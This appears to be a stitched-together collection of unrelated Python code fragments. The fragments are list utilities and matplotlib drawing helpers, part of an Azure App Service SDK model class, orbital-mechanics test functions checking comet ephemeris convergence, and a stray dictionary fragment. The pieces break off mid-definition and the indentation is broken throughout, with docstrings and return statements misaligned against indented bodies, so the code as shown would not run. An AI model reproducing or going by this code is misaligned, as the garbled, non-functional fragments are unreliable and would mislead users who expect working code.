:NOTES:
-- Will fail if 'obj' is itself a list.
-- Edits list in-place, so make a copy first if you want to
retain the old version of your list.
-- Has not been tested for extremely deep lists
:SEE ALSO:
:func:`popall`
"""
#2009-09-11 10:22 IJC: Created
n = len(seq)
    for ii in range(n):
        if isinstance(seq[ii], list):
            replaceall(seq[ii], obj, rep)
        elif seq[ii]==obj:
            seq[ii] = rep
return
def popall(seq, obj):
"""Remove all instances of 'obj' from list 'seq'
:INPUT:
seq -- (list) list from which to pop elements
obj -- target object to remove
:EXAMPLE:
::
import tools
b = [3, 'spam', range(5)]
tools.popall(b, 4)
print b
:NOTES:
-- Will fail if 'obj' is itself a list.
-- Edits list in-place, so make a copy first if you want to
retain the old version of your list.
-- Has not been tested for extremely deep lists
:SEE ALSO:
:func:`replaceall`
"""
#2009-09-11 10:22 IJC: Created
    n = len(seq)
    for ii in range(n):
        if isinstance(seq[ii], list):
            popall(seq[ii], obj)
    doneYet = False
    while not doneYet:
        try:
            seq.remove(obj)
        except ValueError:
            doneYet = True
return
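# Expected results for the docstring examples above (illustrative values):
#   replaceall(b, 'spam', 'bacon')  -->  b == [2, ['bacon', ['eggs', 5, {'spam': 3}]]]
#     (only list elements are replaced; dictionary keys/values are left untouched)
#   popall([3, 'spam', list(range(5))], 4)  -->  [3, 'spam', [0, 1, 2, 3]]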
def drawRectangle(x,y,width,height,**kw):
"""Draw a rectangle patch on the current, or specified, axes.
:INPUT:
x, y -- lower-left corner of rectangle
width, height -- dimensions of rectangle
:OPTIONAL INPUT:
ax -- Axis to draw upon. if None, defaults to current axes.
dodraw -- if True, call 'draw()' function to immediately re-draw axes.
**kw -- options passable to :func:`matplotlib.patches.Rectangle`
:NOTE: Axes will NOT auto-rescale after this is called.
"""
# 2009-09-17 01:33 IJC: Created
# 2014-03-01 13:51 IJMC: Added 'dodraw' option.
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
    ax = kw.pop('ax', None)
    if ax is None:
        ax = plt.gca()
    dodraw = kw.pop('dodraw', False)
    p = mpatches.Rectangle((x,y), width, height, **kw)
    ax.add_patch(p)
    if dodraw: plt.draw()
return ax, p
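# Illustrative usage sketch (hypothetical figure; remember that the axes are not
# rescaled automatically, so set the limits yourself):
#   import matplotlib.pyplot as plt
#   plt.plot([0, 10], [0, 10], 'k--')
#   ax, patch = drawRectangle(2, 2, 4, 3, facecolor='0.8', dodraw=True)
#   ax.set_xlim(0, 10); ax.set_ylim(0, 10)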
def drawPolygon(xy,**kw):
"""Draw a rectangle patch on the current, or specified, axes.
:INPUT:
xy -- numpy array of coordinates, with shape Nx2.
:OPTIONAL INPUT:
ax -- Axis to draw upon. if None, defaults to current axes.
dodraw -- if True, call 'draw()' function to immediately re-draw axes.
**kw -- options passable to :func:`matplotlib.patches.Polygon`
:SEE ALSO:
:func:`drawRectangle`
:NOTE: | |
'last_modified_time_utc': {'readonly': True},
'traffic_manager_host_names': {'readonly': True},
'target_swap_slot': {'readonly': True},
'outbound_ip_addresses': {'readonly': True},
'possible_outbound_ip_addresses': {'readonly': True},
'suspended_till': {'readonly': True},
'max_number_of_workers': {'readonly': True},
'resource_group': {'readonly': True},
'is_default_container': {'readonly': True},
'default_host_name': {'readonly': True},
'slot_swap_status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'ManagedServiceIdentity'},
'state': {'key': 'properties.state', 'type': 'str'},
'host_names': {'key': 'properties.hostNames', 'type': '[str]'},
'repository_site_name': {'key': 'properties.repositorySiteName', 'type': 'str'},
'usage_state': {'key': 'properties.usageState', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'enabled_host_names': {'key': 'properties.enabledHostNames', 'type': '[str]'},
'availability_state': {'key': 'properties.availabilityState', 'type': 'str'},
'host_name_ssl_states': {'key': 'properties.hostNameSslStates', 'type': '[HostNameSslState]'},
'server_farm_id': {'key': 'properties.serverFarmId', 'type': 'str'},
'reserved': {'key': 'properties.reserved', 'type': 'bool'},
'last_modified_time_utc': {'key': 'properties.lastModifiedTimeUtc', 'type': 'iso-8601'},
'site_config': {'key': 'properties.siteConfig', 'type': 'SiteConfig'},
'traffic_manager_host_names': {'key': 'properties.trafficManagerHostNames', 'type': '[str]'},
'scm_site_also_stopped': {'key': 'properties.scmSiteAlsoStopped', 'type': 'bool'},
'target_swap_slot': {'key': 'properties.targetSwapSlot', 'type': 'str'},
'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
'client_affinity_enabled': {'key': 'properties.clientAffinityEnabled', 'type': 'bool'},
'client_cert_enabled': {'key': 'properties.clientCertEnabled', 'type': 'bool'},
'host_names_disabled': {'key': 'properties.hostNamesDisabled', 'type': 'bool'},
'outbound_ip_addresses': {'key': 'properties.outboundIpAddresses', 'type': 'str'},
'possible_outbound_ip_addresses': {'key': 'properties.possibleOutboundIpAddresses', 'type': 'str'},
'container_size': {'key': 'properties.containerSize', 'type': 'int'},
'daily_memory_time_quota': {'key': 'properties.dailyMemoryTimeQuota', 'type': 'int'},
'suspended_till': {'key': 'properties.suspendedTill', 'type': 'iso-8601'},
'max_number_of_workers': {'key': 'properties.maxNumberOfWorkers', 'type': 'int'},
'cloning_info': {'key': 'properties.cloningInfo', 'type': 'CloningInfo'},
'snapshot_info': {'key': 'properties.snapshotInfo', 'type': 'SnapshotRecoveryRequest'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'is_default_container': {'key': 'properties.isDefaultContainer', 'type': 'bool'},
'default_host_name': {'key': 'properties.defaultHostName', 'type': 'str'},
'slot_swap_status': {'key': 'properties.slotSwapStatus', 'type': 'SlotSwapStatus'},
'https_only': {'key': 'properties.httpsOnly', 'type': 'bool'},
}
def __init__(
self,
*,
location: str,
kind: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
identity: Optional["ManagedServiceIdentity"] = None,
enabled: Optional[bool] = None,
host_name_ssl_states: Optional[List["HostNameSslState"]] = None,
server_farm_id: Optional[str] = None,
reserved: Optional[bool] = False,
site_config: Optional["SiteConfig"] = None,
scm_site_also_stopped: Optional[bool] = False,
hosting_environment_profile: Optional["HostingEnvironmentProfile"] = None,
client_affinity_enabled: Optional[bool] = None,
client_cert_enabled: Optional[bool] = None,
host_names_disabled: Optional[bool] = None,
container_size: Optional[int] = None,
daily_memory_time_quota: Optional[int] = None,
cloning_info: Optional["CloningInfo"] = None,
snapshot_info: Optional["SnapshotRecoveryRequest"] = None,
https_only: Optional[bool] = None,
**kwargs
):
"""
:keyword kind: Kind of resource.
:paramtype kind: str
:keyword location: Required. Resource Location.
:paramtype location: str
:keyword tags: A set of tags. Resource tags.
:paramtype tags: dict[str, str]
:keyword identity: Managed service identity.
:paramtype identity: ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentity
:keyword enabled: :code:`<code>true</code>` if the app is enabled; otherwise,
:code:`<code>false</code>`. Setting this value to false disables the app (takes the app
offline).
:paramtype enabled: bool
:keyword host_name_ssl_states: Hostname SSL states are used to manage the SSL bindings for
app's hostnames.
:paramtype host_name_ssl_states: list[~azure.mgmt.web.v2016_09_01.models.HostNameSslState]
:keyword server_farm_id: Resource ID of the associated App Service plan, formatted as:
"/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
:paramtype server_farm_id: str
:keyword reserved: :code:`<code>true</code>` if reserved; otherwise,
:code:`<code>false</code>`.
:paramtype reserved: bool
:keyword site_config: Configuration of the app.
:paramtype site_config: ~azure.mgmt.web.v2016_09_01.models.SiteConfig
:keyword scm_site_also_stopped: :code:`<code>true</code>` to stop SCM (KUDU) site when the app
is stopped; otherwise, :code:`<code>false</code>`. The default is :code:`<code>false</code>`.
:paramtype scm_site_also_stopped: bool
:keyword hosting_environment_profile: App Service Environment to use for the app.
:paramtype hosting_environment_profile:
~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
:keyword client_affinity_enabled: :code:`<code>true</code>` to enable client affinity;
:code:`<code>false</code>` to stop sending session affinity cookies, which route client
requests in the same session to the same instance. Default is :code:`<code>true</code>`.
:paramtype client_affinity_enabled: bool
:keyword client_cert_enabled: :code:`<code>true</code>` to enable client certificate
authentication (TLS mutual authentication); otherwise, :code:`<code>false</code>`. Default is
:code:`<code>false</code>`.
:paramtype client_cert_enabled: bool
:keyword host_names_disabled: :code:`<code>true</code>` to disable the public hostnames of the
app; otherwise, :code:`<code>false</code>`.
If :code:`<code>true</code>`, the app is only accessible via API management process.
:paramtype host_names_disabled: bool
:keyword container_size: Size of the function container.
:paramtype container_size: int
:keyword daily_memory_time_quota: Maximum allowed daily memory-time quota (applicable on
dynamic apps only).
:paramtype daily_memory_time_quota: int
:keyword cloning_info: If specified during app creation, the app is cloned from a source app.
:paramtype cloning_info: ~azure.mgmt.web.v2016_09_01.models.CloningInfo
:keyword snapshot_info: If specified during app creation, the app is created from a previous
snapshot.
:paramtype snapshot_info: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryRequest
:keyword https_only: HttpsOnly: configures a web site to accept only https requests. Issues
redirect for
http requests.
:paramtype https_only: bool
"""
super(Site, self).__init__(kind=kind, location=location, tags=tags, **kwargs)
self.identity = identity
self.state = None
self.host_names = None
self.repository_site_name = None
self.usage_state = None
self.enabled = enabled
self.enabled_host_names = None
self.availability_state = None
self.host_name_ssl_states = host_name_ssl_states
self.server_farm_id = server_farm_id
self.reserved = reserved
self.last_modified_time_utc = None
self.site_config = site_config
self.traffic_manager_host_names = None
self.scm_site_also_stopped = scm_site_also_stopped
self.target_swap_slot = None
self.hosting_environment_profile = hosting_environment_profile
self.client_affinity_enabled = client_affinity_enabled
self.client_cert_enabled = client_cert_enabled
self.host_names_disabled = host_names_disabled
self.outbound_ip_addresses = None
self.possible_outbound_ip_addresses = None
self.container_size = container_size
self.daily_memory_time_quota = daily_memory_time_quota
self.suspended_till = None
self.max_number_of_workers = None
self.cloning_info = cloning_info
self.snapshot_info = snapshot_info
self.resource_group = None
self.is_default_container = None
self.default_host_name = None
self.slot_swap_status = None
self.https_only = https_only
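    # Illustrative construction sketch (resource names and IDs below are
    # placeholders, not values from this SDK):
    #   site = Site(
    #       location="westeurope",
    #       server_farm_id="/subscriptions/<sub-id>/resourceGroups/<rg>/providers/"
    #                      "Microsoft.Web/serverfarms/<plan-name>",
    #       https_only=True,
    #       tags={"env": "test"},
    #   )
    #   # Read-only properties such as site.default_host_name stay None until the
    #   # service populates them in a response.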
class SiteConfig(msrest.serialization.Model):
"""Configuration of an App Service app.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar number_of_workers: Number of workers.
:vartype number_of_workers: int
:ivar default_documents: Default documents.
:vartype default_documents: list[str]
:ivar net_framework_version: .NET Framework version.
:vartype net_framework_version: str
:ivar php_version: Version of PHP.
:vartype php_version: str
:ivar python_version: Version of Python.
:vartype python_version: str
:ivar node_version: Version of Node.js.
:vartype node_version: str
:ivar linux_fx_version: Linux App Framework and version.
:vartype linux_fx_version: str
:ivar request_tracing_enabled: :code:`<code>true</code>` if request tracing is enabled;
otherwise, :code:`<code>false</code>`.
:vartype request_tracing_enabled: bool
:ivar request_tracing_expiration_time: Request tracing expiration time.
:vartype request_tracing_expiration_time: ~datetime.datetime
:ivar remote_debugging_enabled: :code:`<code>true</code>` if remote debugging is enabled;
otherwise, :code:`<code>false</code>`.
:vartype remote_debugging_enabled: bool
:ivar remote_debugging_version: Remote debugging version.
:vartype remote_debugging_version: str
:ivar http_logging_enabled: :code:`<code>true</code>` if HTTP logging is enabled; otherwise,
:code:`<code>false</code>`.
:vartype http_logging_enabled: bool
:ivar logs_directory_size_limit: HTTP logs directory size limit.
:vartype logs_directory_size_limit: int
:ivar detailed_error_logging_enabled: :code:`<code>true</code>` if detailed error logging is
enabled; otherwise, :code:`<code>false</code>`.
:vartype detailed_error_logging_enabled: bool
:ivar publishing_username: Publishing user name.
:vartype publishing_username: str
:ivar app_settings: Application settings.
:vartype app_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
:ivar connection_strings: Connection strings.
:vartype connection_strings: list[~azure.mgmt.web.v2016_09_01.models.ConnStringInfo]
:ivar machine_key: Site MachineKey.
:vartype machine_key: ~azure.mgmt.web.v2016_09_01.models.SiteMachineKey
:ivar handler_mappings: Handler mappings.
:vartype handler_mappings: list[~azure.mgmt.web.v2016_09_01.models.HandlerMapping]
:ivar document_root: Document root.
:vartype document_root: str
:ivar scm_type: SCM type. Possible values include: "None", "Dropbox", "Tfs", "LocalGit",
"GitHub", "CodePlexGit", "CodePlexHg", "BitbucketGit", "BitbucketHg", "ExternalGit",
"ExternalHg", "OneDrive", "VSO".
:vartype scm_type: str or ~azure.mgmt.web.v2016_09_01.models.ScmType
:ivar use32_bit_worker_process: :code:`<code>true</code>` to use 32-bit worker process;
otherwise, :code:`<code>false</code>`.
:vartype use32_bit_worker_process: bool
:ivar web_sockets_enabled: :code:`<code>true</code>` if WebSocket is enabled; otherwise,
:code:`<code>false</code>`.
:vartype web_sockets_enabled: bool
:ivar always_on: :code:`<code>true</code>` if Always On is enabled; otherwise,
:code:`<code>false</code>`.
:vartype always_on: bool
:ivar java_version: Java version.
:vartype java_version: str
:ivar java_container: Java container.
:vartype java_container: str
:ivar java_container_version: Java container version.
:vartype java_container_version: str
:ivar app_command_line: App command line to launch.
:vartype app_command_line: str
:ivar managed_pipeline_mode: Managed pipeline mode. Possible values include: "Integrated",
"Classic".
:vartype managed_pipeline_mode: str or ~azure.mgmt.web.v2016_09_01.models.ManagedPipelineMode
:ivar virtual_applications: Virtual applications.
:vartype virtual_applications: list[~azure.mgmt.web.v2016_09_01.models.VirtualApplication]
:ivar load_balancing: Site load balancing. Possible values include: "WeightedRoundRobin",
"LeastRequests", "LeastResponseTime", "WeightedTotalTraffic", "RequestHash".
:vartype load_balancing: str or ~azure.mgmt.web.v2016_09_01.models.SiteLoadBalancing
:ivar experiments: This is work around for polymorphic types.
:vartype experiments: ~azure.mgmt.web.v2016_09_01.models.Experiments
:ivar limits: Site limits.
:vartype limits: ~azure.mgmt.web.v2016_09_01.models.SiteLimits
:ivar auto_heal_enabled: :code:`<code>true</code>` if Auto Heal is enabled; otherwise,
:code:`<code>false</code>`.
:vartype auto_heal_enabled: bool
:ivar auto_heal_rules: Auto Heal rules.
:vartype auto_heal_rules: ~azure.mgmt.web.v2016_09_01.models.AutoHealRules
:ivar tracing_options: Tracing options.
:vartype tracing_options: str
:ivar vnet_name: Virtual Network name.
:vartype vnet_name: str
:ivar cors: Cross-Origin Resource Sharing (CORS) settings.
:vartype cors: ~azure.mgmt.web.v2016_09_01.models.CorsSettings
:ivar push: Push endpoint settings.
:vartype push: ~azure.mgmt.web.v2016_09_01.models.PushSettings
:ivar api_definition: Information about the formal API definition for the app.
:vartype api_definition: ~azure.mgmt.web.v2016_09_01.models.ApiDefinitionInfo
:ivar auto_swap_slot_name: Auto-swap slot name.
:vartype auto_swap_slot_name: str
:ivar local_my_sql_enabled: :code:`<code>true</code>` to enable local MySQL; otherwise,
:code:`<code>false</code>`.
:vartype local_my_sql_enabled: bool
:ivar ip_security_restrictions: IP security restrictions.
:vartype ip_security_restrictions:
list[~azure.mgmt.web.v2016_09_01.models.IpSecurityRestriction]
:ivar http20_enabled: Http20Enabled: configures a web site to allow clients to connect over
http2.0.
:vartype http20_enabled: bool
:ivar min_tls_version: MinTlsVersion: configures the minimum version of TLS required for SSL
requests. Possible values include: "1.0", "1.1", "1.2".
:vartype min_tls_version: str or ~azure.mgmt.web.v2016_09_01.models.SupportedTlsVersions
"""
_validation = {
'machine_key': {'readonly': True},
}
_attribute_map = {
'number_of_workers': {'key': 'numberOfWorkers', 'type': 'int'},
'default_documents': {'key': 'defaultDocuments', 'type': '[str]'},
'net_framework_version': {'key': 'netFrameworkVersion', 'type': 'str'},
'php_version': {'key': 'phpVersion', 'type': 'str'},
'python_version': {'key': 'pythonVersion', 'type': 'str'},
'node_version': {'key': 'nodeVersion', 'type': 'str'},
'linux_fx_version': {'key': 'linuxFxVersion', 'type': 'str'},
'request_tracing_enabled': {'key': 'requestTracingEnabled', 'type': 'bool'},
'request_tracing_expiration_time': {'key': 'requestTracingExpirationTime', 'type': 'iso-8601'},
'remote_debugging_enabled': {'key': 'remoteDebuggingEnabled', | |
""" This module provides the functionality to calculate ephemeris for two bodies problem
also in the case of perturbed methods. More advance pertubed methods will be handled
in other module
"""
# Standard library imports
import logging
from math import isclose
from typing import ForwardRef
# Third party imports
import pandas as pd
import numpy as np
from numpy.linalg import norm
from toolz import pipe
# Local application imports
from myorbit.util.general import my_range, NoConvergenceError, my_isclose
import myorbit.data_catalog as dc
from myorbit.util.timeut import mjd2str_date
from myorbit.planets import g_xyz_equat_sun_j2000
from myorbit.kepler.keplerian import KeplerianStateSolver, ParabolicalStateSolver, EllipticalStateSolver
from myorbit.kepler.ellipitical import calc_rv_for_elliptic_orbit, calc_M
from myorbit.lagrange.lagrange_coeff import calc_rv_from_r0v0
from myorbit.util.general import mu_Sun, calc_eccentricity_vector, angle_between_vectors
from myorbit.pert_cowels import calc_eph_by_cowells
from myorbit.two_body import calc_eph_planet
from myorbit.util.timeut import EQX_B1950, EQX_J2000
from myorbit.ephemeris_input import EphemrisInput
from myorbit.pert_enckes import calc_eph_by_enckes
from myorbit.two_body import calc_eph_twobody
from myorbit.util.constants import *
logger = logging.getLogger(__name__)
def calc_tp(M0, a, epoch):
deltaT = TWOPI*np.sqrt(pow(a,3)/GM)*(1-M0/TWOPI)
return deltaT + epoch
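# Reasoning behind calc_tp (illustrative): the orbital period is
# T = TWOPI * sqrt(a**3 / GM), and the mean anomaly grows linearly with time, so a
# body whose mean anomaly is M0 at 'epoch' reaches the next perihelion (M = TWOPI)
# after (1 - M0/TWOPI) * T. calc_tp adds that interval to the epoch; with GM in
# AU**3/day**2 (assumed here) the interval is in days, so the result is an MJD.
# For example, M0 = pi (half an orbit past perihelion) gives tp = epoch + T/2.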
def calc_comets_that_no_converge(delta_days):
"""The orbit of all comets is studied around the perihelion [-days, +days]
Parameters
----------
delta_days : int
[description]
"""
df = dc.DF_COMETS
not_converged=[]
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
msg = f'Testing Object: {obj.name}'
print (msg)
logger.info(msg)
if hasattr(obj,'M0') :
M_at_epoch = obj.M0
else :
M_at_epoch = None
        # from delta_days days before perihelion passage to delta_days days after perihelion passage
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd, M_at_epoch=M_at_epoch)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
hs = []
es = []
for dt in range(2,delta_days*2,2):
clock_mjd = T0_MJD + dt
try :
r_xyz, rdot_xyz, h_xyz, f = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
hs.append(np.linalg.norm(h_xyz))
es.append(np.linalg.norm(calc_eccentricity_vector(r_xyz, rdot_xyz,h_xyz)))
except NoConvergenceError :
print (f"===== Object {name} doest not converged at {clock_mjd} MJD")
not_converged.append(name)
if not all(isclose(h, hs[0], abs_tol=1e-12) for h in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
if not all(isclose(ec, es[0], abs_tol=1e-12) for ec in es):
            msg = f'The eccentricity vector is NOT constant in the orbit'
print (msg)
logger.error(msg)
print (not_converged)
def test_all_bodies(delta_days):
df = dc.DF_BODIES
not_converged=[]
for idx, name in enumerate(df['Name']):
body = dc.read_body_elms_for(name,df)
msg = f'Testing Object: {body.name}'
solver = KeplerianStateSolver.make(e=body.e, a=body.a, epoch=body.epoch_mjd, M_at_epoch=body.M0)
tp = calc_tp(body.M0, body.a, body.epoch_mjd)
hs = []
try :
for clock_mjd in my_range(tp-delta_days, tp+delta_days, 2):
r_xyz, rdot_xyz, r, h = solver.calc_rv(clock_mjd)
hs.append(h)
if not all(isclose(h, hs[0], abs_tol=1e-12) for h in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
except NoConvergenceError :
print (f"===========> NOT converged for object {name}")
not_converged.append(name)
if idx % 1000 == 0 :
print (f"================================================>> {idx}")
print (not_converged)
def test_almost_parabolical(delta_days):
df = dc.DF_COMETS
not_converged=[]
names = ['C/1680 V1', 'C/1843 D1 (Great March comet)', 'C/1882 R1-A (Great September comet)', 'C/1882 R1-B (Great September comet)', 'C/1882 R1-C (Great September comet)', 'C/1882 R1-D (Great September comet)', 'C/1963 R1 (Pereyra)', 'C/1965 S1-A (Ikeya-Seki)', 'C/1965 S1-B (Ikeya-Seki)', 'C/1967 C1 (Seki)', 'C/1970 K1 (White-Ortiz-Bolelli)', 'C/2004 V13 (SWAN)', 'C/2011 W3 (Lovejoy)', 'C/2013 G5 (Catalina)', 'C/2020 U5 (PANSTARRS)']
#names = ['C/2020 U5 (PANSTARRS)']
df = df[df.Name.isin(names)]
for idx, name in enumerate(df['Name']):
if name not in names :
continue
obj = dc.read_comet_elms_for(name,df)
msg = f'Testing Object: {obj.name} with Tp:{mjd2str_date(obj.tp_mjd)}'
print (msg)
logger.info(msg)
if hasattr(obj,'M0') :
M_at_epoch = obj.M0
else :
M_at_epoch = None
        # from delta_days days before perihelion passage to delta_days days after perihelion passage
#solver = ParabolicalStateSolver(obj.tp_mjd, obj.q, obj.e)
solver = EllipticalStateSolver(q=obj.q, a=obj.a, e=obj.e, tp_mjd=obj.tp_mjd, epoch_mjd=obj.epoch_mjd)
hs = []
for clock_mjd in my_range(obj.tp_mjd-delta_days, obj.tp_mjd+delta_days, 2):
r_xyz, rdot_xyz, r, h_xyz, *others = solver.calc_rv(clock_mjd)
hs.append(h_xyz)
print(mjd2str_date(clock_mjd))
if not all(np.allclose(h_xyz, hs[0], atol=1e-12) for h_xyz in hs):
msg = f'The angular momentum is NOT constant in the orbit'
print (msg)
logger.error(msg)
print (not_converged)
def test_comets_convergence(delta_days=50):
df = dc.DF_COMETS
#FILTERED_OBJS = ['C/1680 V1', 'C/1843 D1 (Great March comet)', 'C/1882 R1-A (Great September comet)', 'C/1882 R1-B (Great September comet)', 'C/1882 R1-C (Great September comet)', 'C/1882 R1-D (Great September comet)', 'C/1963 R1 (Pereyra)', 'C/1965 S1-A (Ikeya-Seki)', 'C/1965 S1-B (Ikeya-Seki)', 'C/1967 C1 (Seki)', 'C/1970 K1 (White-Ortiz-Bolelli)', 'C/2004 V13 (SWAN)', 'C/2011 W3 (Lovejoy)', 'C/2013 G5 (Catalina)', 'C/2020 U5 (PANSTARRS)']
#FILTERED_OBJS=['C/1827 P1 (Pons)']
FILTERED_OBJS=[]
if len(FILTERED_OBJS) != 0:
df = df[df.Name.isin(FILTERED_OBJS)]
result = []
df = df.sort_values('e', ascending=False)
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
kep_nc = uni_nc = 0
#print (f"Object {name} with e={obj.e}")
for dt in range(2,delta_days*2,2):
r1_xyz = rdot1_xyz = f1 = None
try :
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
except NoConvergenceError :
kep_nc += 1
r2_xyz = rdot2_xyz = f2 = None
try :
r2_xyz, rdot2_xyz, h_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
except NoConvergenceError :
uni_nc += 1
print (f"The noconvergence was with e: {obj.e}")
if (kep_nc >0) or (uni_nc > 0) :
row = {}
row['name'] = name
row['e'] = obj.e
row['kep_nc'] = kep_nc
row['uni_nc'] = uni_nc
result.append(row)
df_out = pd.DataFrame(result)
if len(df_out) > 0:
print (f'There are {len(df_out)} comets with convergence problems')
df_out = df_out.sort_values(by=['uni_nc','kep_nc'],ascending=False)
df_out.to_csv('convergence_problems.csv',index=False,header=True)
else :
print ("Undetected no-convergences")
def test_universal_kepler(delta_days=50):
df = dc.DF_COMETS
FILTERED_OBJS=[]
#FILTERED_OBJS=['C/1933 D1 (Peltier)','C/1989 R1 (Helin-Roman)','C/2007 M5 (SOHO)','C/1988 M1 (SMM)','C/2008 C5 (SOHO)']
#FILTERED_OBJS=['C/2007 M5 (SOHO)']
# C/2000 O1 (Koehn)
# This one has high nonconverence with 500 C/2000 O1 (Koehn)
if len(FILTERED_OBJS) != 0:
df = df[df.Name.isin(FILTERED_OBJS)]
df = df.sort_values('e', ascending=False)
result = []
for idx, name in enumerate(df['Name']):
obj = dc.read_comet_elms_for(name,df)
#print (name)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
r_failed = v_failed = f_failed = nc_failed= 0
for dt in range(2,delta_days*2,2):
try :
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
r2_xyz, rdot2_xyz, h2_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
e_xyz = calc_eccentricity_vector(r1_xyz, rdot1_xyz, h1_xyz)
f3 = angle_between_vectors(e_xyz, r1_xyz)
if not isclose(f1,f2,rel_tol=0, abs_tol=1e-03):
f_failed += 1
msg=f"name: {obj.name}, TWOPI - f univ: {TWOPI-f2} f Universal: {f2} f Kepler: {f1} e:{obj.e} f Excentricity: {f3} f Excentricity: {TWOPI-f3}"
logger.error(msg)
if not my_isclose(r1_xyz, r2_xyz, abs_tol=1e-03):
msg = f"name: {obj.name}, e: {obj.e}, diff_rxyz ={np.linalg.norm(r1_xyz- r2_xyz)} diff_rdotxyz: {np.linalg.norm(rdot1_xyz- rdot2_xyz)}"
logger.error(msg)
r_failed += 1
if not my_isclose (rdot1_xyz, rdot2_xyz, abs_tol=1e-03) :
v_failed += 1
except NoConvergenceError :
nc_failed += 1
if (f_failed >0) or (r_failed > 0) or (v_failed > 0) or (nc_failed > 0):
row = {}
row['name'] = name
row['e'] = obj.e
row['f_failed'] = f_failed
row['r_failed'] = r_failed
row['v_failed'] = v_failed
row['nc_failed'] = nc_failed
result.append(row)
df_out = pd.DataFrame(result)
if len(df_out) > 0:
print (f'There are {len(df_out)} comets with convergence problems')
#df_out = df_out.sort_values(by=['uni_nc','kep_nc'],ascending=False)
df_out.to_csv('kepler_universal.csv',index=False,header=True)
print (df_out)
else :
print ("No problems detected")
def test_enckes():
obj= dc.C_2003_M3_SOHO
eph = EphemrisInput(from_date="2001.03.01.0",
to_date = "2005.08.31.0",
step_dd_hh_hhh = "02 00.0",
equinox_name = EQX_J2000)
dfc = calc_eph_by_enckes(obj, eph)
def test_comet(name, delta_days=50):
obj = dc.read_comet_elms_for(name,dc.DF_COMETS)
solver = KeplerianStateSolver.make(e=obj.e, a=obj.a, tp_mjd=obj.tp_mjd, q=obj.q, epoch=obj.epoch_mjd)
T0_MJD = obj.tp_mjd-delta_days
#print (f"Time interval considered: from:{mjd2str_date(T0_MJD-delta_days)} to {mjd2str_date(T0_MJD+delta_days)}")
r0_xyz, rdot0_xyz, r0, h0_xyz, _ , f0 = solver.calc_rv(T0_MJD)
    max_diff_r = 0
    nc_failed = 0
for dt in range(2,delta_days*2,2):
try :
print (f"{mjd2str_date(T0_MJD+dt)}")
r1_xyz, rdot1_xyz, r1, h1_xyz, _ , f1 = solver.calc_rv(T0_MJD+dt)
r2_xyz, rdot2_xyz, h2_xyz, f2 = calc_rv_from_r0v0(mu_Sun, r0_xyz, rdot0_xyz, dt, f0)
if not isclose(f1,f2, rel_tol=0, abs_tol=1e-03):
msg=f"{mjd2str_date(T0_MJD+dt)} f Uni:{f2} f Kepler:{f1} TWOPI-f:{TWOPI-f1}"
print (msg)
logger.error(msg)
if not my_isclose(r1_xyz, r2_xyz, abs_tol=1e-07):
diff_rxyz = np.linalg.norm(r1_xyz- r2_xyz)
if diff_rxyz > max_diff_r :
max_diff_r = diff_rxyz
print (f"Maximun distance at time:{mjd2str_date(T0_MJD+dt)}")
msg = f"{mjd2str_date(T0_MJD+dt)}, diff_rxyz ={np.linalg.norm(r1_xyz- r2_xyz)} diff_rdotxyz: {np.linalg.norm(rdot1_xyz- rdot2_xyz)}"
print (msg)
logger.error(msg)
except NoConvergenceError :
nc_failed += 1
def test_near_parabollic():
obj=dc.C_2007_M5_SOHO
eph = EphemrisInput(from_date="2007.06.15.0",
to_date = "2007.07.15.0",
step_dd_hh_hhh = "02 00.0",
equinox_name = EQX_J2000)
df = calc_eph_twobody(obj, eph, force_orbit='near_parabolical')
#df = calc_eph_twobody(obj, eph)
print (df)
def change_reference_frame(heliocentric_orbs, name):
orbs_from_obj = dict()
    # A new orbs dict is created, changing the frame of reference from the Sun to
    # the named object; that object must itself be present in heliocentric_orbs.
for body_name in filter(lambda x : x.lower()!=name.lower(), heliocentric_orbs.keys()):
orbs_from_obj[body_name] = heliocentric_orbs[body_name] - heliocentric_orbs[name]
| |
'prf': str,
'dh_group': list,
}
},
